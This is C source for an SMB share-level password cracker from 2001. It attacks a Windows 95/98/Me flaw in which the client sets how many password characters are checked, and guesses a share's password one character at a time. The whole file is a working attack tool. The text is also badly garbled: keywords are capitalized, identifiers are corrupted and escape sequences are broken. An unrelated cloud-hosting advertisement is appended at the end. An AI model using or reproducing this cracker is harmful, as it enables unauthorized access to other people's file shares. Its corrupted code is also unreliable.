/* SMB. c Last edited Thu Nov 15 11:10:36 CET 2001 by Noah
*
* SMB sharelevel cracker by snuggl@hack.se
* Usage: SMB 192.168.0.1 // netbiosname/sharename
*
* This works with a bug in MS Implementation of the SMB sharelevel password sheme
* Where it is the client that deciedes how many chars in the passwords that shoshould be validated.
* Works with Windows 95/08/Me, (maybe NT/2 K with sharelvl security ?)
* MS has released a patch for it.
*
* Todo-fixa automagisk IP-> NetBIOS Translation
*-Fixa listning AV shares F contains N multicast nd IP adress
*-Fixa s? Den Kan sweepa HNA n ERK =)
*
* V0.2-> v0.3: patch by noah@hd.se
* Added-H argument for Hollywood stylee output
*
*/
# Include <stdio. h>
# Include <string. h>
# Include <sys/types. h>
// # Include <sys/socket. h>
// # Include <netinet/in. h>
// # Include <netdb. h>
# Define smb_port 139
Long secret_number;
Char comment _name [100];
Char passwd [100];
Char SMB [512];
Char slask [8192];
Int make_smb_session (INT socket, char * Name, char * passwd ){
Int I;
Int J = 0;
Int Len;
Char netbios_name [100];
Char netbios_form [100];
Char session [512];
Char data [8192];
Char temp [2];
Int lp_len, lp_raw_len, lp_high, lp_low;
Int lp_raw_high, lp_raw_low;
Int pass_len, pass_len_low, pass_len_high;
Memset (Session, 0, sizeof (Session ));
Memset (netbios_name, 0, sizeof (netbios_name ));
Memset (netbios_form, 0, sizeof (netbios_form ));
// L handle in NetBIOS namnet.
For (I = 2; I <100 & export _name [I]! = '//'; I ++)
Netbios_name [I-2] = pai_name [I];
# Ifdef debug
Printf ("using NetBIOS name =/" % S/"/N", netbios_name );
# Endif
// Omvandla NetBIOS namnet till ETT sjuukt format
Len = strlen (netbios_name );
For (I = 0; I <16; I ++ ){
If (I <Len ){
Temp [0] = netbios_name [I]/16 + 65;
Temp [1] = netbios_name [I] % 16 + 65;
}
Else {
Temp [0] = 'C ';
Temp [1] = 'a ';
}
Netbios_form [J] = temp [0];
Netbios_form [J + 1] = temp [1];
J + = 2;
}
// Nu Har VI fixat NetBIOS namnet
Session [0] = 0x81;
Session [3] = 0x48;
Session [4] = 0x20; // ETT space F e namnet
Memcpy (& session [5], netbios_form, J );
Session [6 + J] = 0x20; // ETT space efter namet
Sprintf (netbios_form, "cacacacacacacacacacacaaa ");
Memcpy (& session [7 + J], netbios_form, 32 );
# Ifdef debug
Printf ("sending session request. (packet Len = % I)/n", 7 + J );
# Endif
If (send (socket, session, 37 + J, 0) =-1 ){
Printf ("error: cant send Session Request./N ");
Return 0;
}
Memset (slask, 0,8192 );
# Ifdef debug
Printf ("recieving session info. (If you are running this against a Samba server, it will stay here forever)/n ");
# Endif
If (Recv (socket, slask, 8192, 0) =-1 ){
Printf ("error: cant Recv session info/N ");
Return 0;
}
# Ifdef debug
Printf ("got session info. (packet Len = % I)/n", strlen (slask ));
# Endif
Secret_number = slask [33] * 256 + slask [32];
# Ifdef debug
Printf ("calculating number =/" % x/"/N", secret_number );
Printf ("got response/" % x/"/N", slask [0]);
# Endif
If (slask [0]! = 0xffffff82 ){
Printf ("error: There is no SMB server on port % I/N", smb_port );
Return 0;
}
Lp_raw_len = strlen (name) + 1 + strlen (passwd) + 1;
Lp_len = lp_raw_len + 55;
Lp_raw_high = lp_raw_len/256;
Lp_high = lp_len/256;
Lp_raw_low = lp_raw_len % 256;
Lp_low = lp_len % 256;
Pass_len = strlen (passwd) + 1;
Pass_len_height = pass_len/256;
Pass_len_low = fig % 256;
Memset (data, 0, sizeof (data ));
Data [2] = lp_high;
Data [3] = lp_low;
Data [4] = 0xff;
Data [5] = 0x53;
Data [6] = 0x4d;
Data [7] = 0x42;
Data [8] = 0x73;
Data [13] = 0x18;
Data [14] = 0x01;
Data [15] = 0x20;
Data [31] = 0x28;
Data [36] = 0x0a;
Data [37] = 0xff;
Data [41] = 0x04;
Data [42] = 0x11;
Data [43] = 0x02;
Data [51] = pass_len_low;
Data [52] = pass_len_high;
Data [57] = lp_raw_low;
Data [58] = lp_raw_high;
Memcpy (& Data [59], passwd, strlen (passwd ));
Memcpy (& Data [60 + strlen (passwd)], name, strlen (name ));
# Ifdef debug
Printf ("sending Login Sequence./N ");
# Endif
If (send (socket, Data, lp_raw_len + 59,0) =-1)
Return-1;
# Ifdef debug
Printf ("recieving login info./N ");
# Endif
If (Recv (socket, Data, 0) =-1)
Return-1;
# Ifdef debug
Printf ("got response =/" % x/"/N", data [9]);
# Endif
Return (data [9]);
}
Void make_smb_packet (const char * share, const char * passwd ){
Memset (SMB, 0, sizeof (SMB ));
SMB [4] = 0xff;
SMB [5] ='s ';
SMB [6] = 'M ';
SMB [7] = 'B ';
SMB [8] = 'U ';
SMB [13] = 0x18;
SMB [14] = 0x01;
SMB [15] = '';
SMB [31] = 0x28;
SMB [32] = secret_number %256;
SMB [33] = secret_number/256;
SMB [36] = 0x04;
SMB [37] = 0xff;
// L limit gden P? L else enord samt l else gden P? L En + share namnet.
SMB [43] = strlen (passwd); // H accept ligger Hana felet =)
SMB [45] = strlen (passwd) + strlen (SHARE) + 1;
Memcpy (& SMB [47], passwd, strlen (passwd ));
Memcpy (& SMB [47 + strlen (passwd)], share, strlen (SHARE ));
SMB [48 + strlen (passwd) + strlen (SHARE)] = 0x41;
SMB [49 + strlen (passwd) + strlen (SHARE)] = 0x3a;
// Storlek P? Paketet
SMB [3] = strlen (passwd) + strlen (SHARE) + 47;
}
Int main (INT argc, char ** argv ){
Char meter [] = "| /-//";
Int sock;
Int Len = 1;
Int go, I;
Int Hollywood = 0, N;
Struct sockaddr_in sin;
Struct hostent * hostp;
Printf ("/nsmb javascracker v0.3/nby snuggl@hack.se/n ");
If (argc <3 ){
Printf ("Usage: % s [-H] host // host/share/N", argv [0]);
Printf ("/t-h hollywoodstylee output :)/N ");
Printf ("EX: % s 10.0.0.1 // fileserver/files/N", argv [0]);
Exit (-1 );
}
If (! Strcmp (argv [1], "-h "))
Argv ++, Hollywood ++;
Strncpy (using _name, argv [2], 100 );
For (I = 0; I <strlen (distinct _name); I ++)
If (partition _name [I] = '/')
Using _name [I] = '//';
Else
Using _name [I] = toupper (using _name [I]);
Hostp = gethostbyname (argv [1]);
If (! Hostp) Return-1;
Memset (char *) & sin, 0, sizeof (SIN ));
// Anv receiver der bcopy efter tips fr receiver Noah
Bcopy (hostp-> h_addr, (char *) & sin. sin_addr, hostp-> h_length );
Sin. sin_family = hostp-> h_addrtype;
Sin. sin_port = htons (smb_port );
# Ifdef debug
Printf ("using adress = % S/nusing Port = % I/N", argv [1], ntohs (SIN. sin_port ));
# Endif
Sock = socket (af_inet, sock_stream, 0 );
If (sock =-1 ){
Printf ("error: cant create socket./N ");
Exit (-1 );
}
Go = connect (sock, (struct sockaddr *) & sin, sizeof (SIN ));
If (go =-1 ){
Printf ("error: cant connect./N ");
Exit (-1 );
}
If (make_smb_session (sock, "user", "passwd ")){
Printf ("error: cant make SMB session./N ");
Exit (-1 );
}
Memset (passwd, 0, sizeof (passwd ));
Printf ("starting to whack the SMB server (this may take a few seconds on slow connection)/n ");
Fflush (stdout );
Go = 0;
While (! Go ){
For (I = 1; I <= 255; I ++ ){
If (I % 10)
Passwd [len-1] = I;
Make_smb_packet (partition _name, passwd );
If (send (sock, SMB, strlen (distinct _name)
+ Strlen (passwd) + 51,0) =-1 ){
Printf ("error: cant send smbpacket./N ");
Return 0;
}
Memset (slask, 0, sizeof (slask ));
If (Recv (sock, slask, 8192,0) =-1 ){
Printf ("error: cant Recv smbpacket./N ");
Return 0;
}
If (slask [9] = 0 ){
If (! Hollywood)
Printf ("/n> % C/N", I );
Break;
}
Else
If (I = 255 ){
If (Len! = 1) Go = 1;
Else go = 2;
Passwd [len-1] = 0;
Break;
}
If (Hollywood & (I % Len) = 0 ){
Printf ("/R [% C]/t", meter [I % 4]);
For (n = 0; n <len-1; n ++)
Printf ("% C", passwd [N]);
Fflush (stdout );
Usleep (1000 );
}
}
Len ++;
}
Printf ("/N ");
If (go = 1)
Printf ("work done! Passwd =/"% S/"/N ", passwd );
Else
Printf ("/nsomething did not work, host patched maybe? /N ");
Close (sock );
Return 0;
}
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
